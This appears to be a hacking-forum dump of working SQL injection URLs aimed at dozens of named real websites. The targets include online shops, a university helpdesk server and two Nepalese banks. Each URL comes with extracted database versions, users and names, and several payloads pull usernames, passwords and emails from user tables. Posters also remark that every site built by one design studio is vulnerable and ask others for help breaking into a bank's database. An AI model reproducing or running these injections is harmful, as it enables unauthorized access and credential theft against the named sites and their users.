http://www.windoor.ro/index.php?page=article&id=-31+union+select+1,concat_ws(0x3a,version(),database(),user(),@@version_compile_os),3 Version : 4.0.24-log Database : windoor User : windoor@localhost Os : pc-linux-gnu
http://www.aiaccessory.com/part.php?id=-11226+union+select+1,2,concat_ws(0x3a,version(),user(),database()),4,5,6,7 4.0.13:[email protected]:MYSQL0256 --- http://www.gk-linkor.ru/part.php?id=-54+union+select+1,2,3,concat_ws(0x3a,version(),user(),database()),5,6 4.1.22-log:[email protected]:gk_linkor_db --- http://rusnauka2009.org/part.php?id=-3+union+select+1,concat_ws(0x3a,version(),user(),database()),3,4,5,6,7,8,9,10 4.1.22-standard:rusnauk_rusnauk@localhost:rusnauk_biz
Code: http://www.iitis.gliwice.pl/en/laboratory.php?ID=-1)+union+select+1,2,concat_ws(0x3a,user(),database(),version()),4/* Code: webmaster@localhost:iitis:4.1.11
Code: http://www.tricountyauto.com/part.php?ID=-18+union+select+1,2,3,concat_ws(0x3a,version(),user(),database()),5,6 4.0.24-standard:tricount_web@localhost:tricount_db Code: http://iswebsite.com/part.php?vArticleID=-357+union+select+concat_ws(0x3a,version(),user(),database()),2,3,4,5 4.1.22-standard:iswebsit_admin@localhost:iswebsit_article Code: http://www.claudinepisko.be/fr/code/part.php?id=7+and+substring(version(),1,1)=5 Code: http://www.sortecs.ru/comp.php?id=33&idsub=94+union+select+1,2,3,4,5,concat_ws(0x3a,version(),user(),database()),7,8,9,10,11,12,13,14,15,16/* 4.1.22-log:sortecs2_sortecs@localhost:sortecs2_new Code: http://www.sctrade.ru/news.php?a=39+union+select+1,2,3,concat_ws(0x3a,version(),user(),database()),5,6/* 4.1.22-standard-log:[email protected]:sctrade_main Code: http://www.osacorp.ru/content.php?id=27&idsub=-49+union+select+1,2,concat_ws(0x3a,version(),user(),database()),4,5,6,7,8,9,10,11,12,13 5.1.29-rc-logsacorp@localhostsacorp_main Code: http://www.msn-media.ru/docs_view.php?ss=-10+union+select+1,2,concat_ws(0x3a,version(),user(),database()),4,5,6 5.0.67-log:[email protected]:msnmedi_msn Code: http://www.m-furnitura.ru/comp.php?id=-8+union+select+1,2,3,concat_ws(0x3a,version(),user(),database()),5,6,7,8,9,10,11,12 5.0.67:m-furnitura@localhost:m-furnitura The site has a forum, phpbb. Pulling the accounts from it would be no problem, though the forum is empty. These sites belong to a certain design studio, Patix. I skimmed through the portfolio quickly; all the sites are vulnerable. patix.ru
A sex shop, damn. www.eros.by Code: http://www.eros.by/index.php?raz=0&ch=16&prod=703'+UNION+SELECT+1,2,3,4,concat_ws(0x3a,version(),user(),database()),6,7,8,9,10,11,12,13,14,15,16,17,18,19--+ 5.0.45:h_erotikon@localhost:h_erotikon Nothing interesting in the database =| PS: don't get the wrong idea, I didn't buy anything there, I was just passing by.
http://www.transinsular.net/ver_producto.php?id=999999999999999999+union+select+1,2,3,4,5/* http://www.sealquilatodo.com/ver_producto.php?id=9999999999999999999999999+UNION+SELECT+1,2,3,4,CONCAT_WS(0x3a,id,usuario,password,nombre,email),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20+FROM+usuarios+limit+0,1-- A little shop. PR 2. http://www.hand-ball.net/ver_producto.php?id=-211+union+select+1,version(),3,4,5,6,7,8,9,0,1,12/* http://www.baladiavalklein.com/english/ver_producto.php?id=-110+union+select+1,2,version(),4,5,6,7,8,9,0,1,2,3,14/* http://www.projectitservices.co.uk/case_studies/details.php?id=-11+union+select+1,2,3,4,5-- PR 5. http://www.coinsportal.ru/News/Details.php?ID=-229+union+select+1,2,version(),4,5,6--
http://vsestanki.ru/tech.php?pid=-306+union+select+1,concat_ws(0x3a3a,id,pass,name,email,perm),3,4,5,6,7+from+users+--+ PS: the admin panel probably checks the IP. http://semya.perm.ru/main/news.php?main=1&nid=-213+union+select+1,username,userpass,4,5,6+from+poll_user+--+ http://www.painter.perm.ru/gallery_short_work.php?id_artist_work=-2636+union+select+1,2,3,4,5,6,7,8,9,10,concat_ws(0x3a3a,email,login,pass,viewed),12,13,14+from+artist+limit+2,1+--+
PR 4. http://www.calbank.net/newsite/news/details.php?id=-94+union+select+1,version(),3,4,5,6,7,8,9-- PR 4. http://www.downtownwaukesha.com/member-details.php?ID=-1190+union+select+1,2,3,version(),5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5-- SUNRISE BANK LIMITED, NEPAL PR 3. http://www.sunrisebank.com.np/news-events/details.php?id=-101+union+select+1,2,version(),4,5,6,7,8,9-- 4.1.22 I only found the news table. Looks like the only way is to grind through it with character-by-character brute forcing. Gentlemen, whoever cracks it, please write to me by PM. Another bank in Nepal. DCBL Bank Limited. PR 4. http://www.dcbl.com.np/news-events/details.php?id=-18+union+select+1,2,version(),4,5,6,7,8,9-- 4.1.22
Tic300 PR4 http://www.megachip.ru/catalog.php?open_code=-0202+union+select+concat_ws(0x3a3a,login,password,gid)+from+mega_user+where+login=0x61646D696E+--+ http://www.ekperm.ru/main/news.php?menuid=9§ion=-88+union+select+1,2,3,4,5,6,7,concat_ws(0x3a3a,username,user_password),9,10,11,12,13+from+phpbb_users+limit+1,1+--+
Code: http://ownfl.com/owner.php?id=-1+union+select+1,concat_ws(0x3a,user(),database(),version()),3,4,5,6,7,8,9,10,11,12,13,14,15 Code: ownfl02_commish@localhost:ownfl02_ownfl:5.0.67-community
http://globalbiz.com.np/view_advertisements.php?id=-1+union+select+1,2,concat_Ws(0x3a,version(),user(),database()),4,5,6,7,8,9,10,11,12-- 5.0.67-community:globalbi_globprs@localhost:globalbi_myglobal
Code: http://www.amteore.com/user.php?act=order_query&order_sn=%27%20union%20select%201,2,3,4,5,6,concat(user_name,0x7c,password,0x7c,email),8%20from%20ecs_admin_user/* Code: http://www.amteore.com/user.php?act=order_query&order_sn=%27%20union%20select%201,2,3,4,5,6,concat_ws(0x3a,user(),version(),database()),8/* root@localhost:5.0.45-community-nt-log:amteore file_priv:Y pr:2 godly_ecs@localhost:godly_ecs:4.0.26-standard-log
http://www.rendery.com/goods.php?p=good&t_id=-1+union+select+1,2,concat_Ws(0x3a,version(),user(),database())/* 4.1.22-standard-log rendery_root@localhost rendery_db
Code: http://linux-muzyka.ixion.pl/tekst.php?id=25047+and+substring(version(),1,1)=5 MySQL 3: Code: http://www.lowiecki.pl/felietony/tekst.php?id=158+and+substring(version(),1,1)=3 Code: http://www.peoplepleasure.nl/tekst.php?id=-5+union+select+1,2,concat_ws(0x3a,version(),user(),database()) 4.1.22-log[email protected]eoplepleasure There is a table: members Code: http://www.peoplepleasure.nl/tekst.php?id=-5+union+select+1,2,concat_ws(0x3a,version(),user(),database()) 4.1.20:magicus_2@localhost:magicus_tmp_2 Code: http://trb-res.nl/tekst.php?id=562+and+substring(version(),1,1)=4 Code: http://www.demo.artframe.nl/tekst.php?id=-15+union+select+1,2,3,4,5,concat_ws(0x3a,version(),user(),database()),7,8/* 4.1.21-standard-log:artframe_demo@localhost:artframe_demo Code: http://www.kralen.com/tekst.php?id=173+and+substring(version(),1,1)=4 Code: http://www.ogledalce.co.rs/tekst.php?id=228+and+substring(version(),1,1)=5
MsSQL Code: http://wwwdata.forestry.oregonstate.edu/helpdesk/docs/os.php?id=1+or+1=system_user Code: FORESTRY\IUSR_ZIRCOTE Code: http://wwwdata.forestry.oregonstate.edu/helpdesk/docs/os.php?id=1+or+1=db_name() Code: helpdesk_dynamic Code: http://wwwdata.forestry.oregonstate.edu/helpdesk/docs/os.php?id=1+or+1=@@version Code: Microsoft SQL Server 2005 - 9.00.3077.00 (Intel X86) Dec 17 2008 15:19:45 Copyright (c) 1988-2005 Microsoft Corporation Standard Edition on Windows NT 5.2 (Build 3790: Service Pack 2)
Code: http://www.akvarijske-ribe.com/tekst.php?ID=32+and+substring(version(),1,1)=5 Code: http://www.esmayigitoglu.nl/tekst.php?id=-3+union+select+1,2,3,4,5,concat_ws(0x3a,version(),user(),database()),7,8/* 4.1.21-standard-log:esma_db@localhost:esma_db Code: http://www.windsurf.nieuwetonge.com/tekst.php?id=-16+union+select+1,concat_ws(0x3a,version(),user(),database()),3 4.0.17-standard-log:nieuwetong@localhost:nieuwetong_cms
Code: http://www.fk-stroy.ru/catalog/abc/index.php?contentId=11212+union+select+1,2,concat_ws(0x3a,user(),database(),version()),4 Code: [email protected]:u99295_fkstroy:5.0.67-log
Code: http://www.hsabc.org/content.php?id=10+and+substring(version(),1,1)=4/* Code: http://festklaveret.dk/tekst.php?id=-112+union+select+1,concat_ws(0x3a,version(),user(),database()),3,4,5,6,7,8,9,10,11,12,13 5.0.75:[email protected]:fk_site_data Code: http://tantra-klub.crolink.net/tekst.php?id=1+and+substring(version(),1,1)=4 MySQL 3: Code: http://www.virtualnahercegovina.com/balkan-press/tekst.php?id=641+and+substring(version(),1,1)=3 Code: http://www.sleepbootraaf.nl/tekst.php?id=-35+union+select+1,2,3,4,5,concat_ws(0x3a,version(),user(),database()),7,8/* 4.1.21-standard-log:raaf_db@localhost:raaf_db Code: http://www.i-ceny.ru/p/?action=rubr&razdel=14&rub=140+and+substring(version(),1,1)=5 Code: http://www.ultra.art.pl/teksty/tekst.php?kid=11&id=-12+union+select+1,concat_ws(0x3a,version(),user(),database()),3,4,5,6 5.0.27-log:[email protected]:fitomedic_b284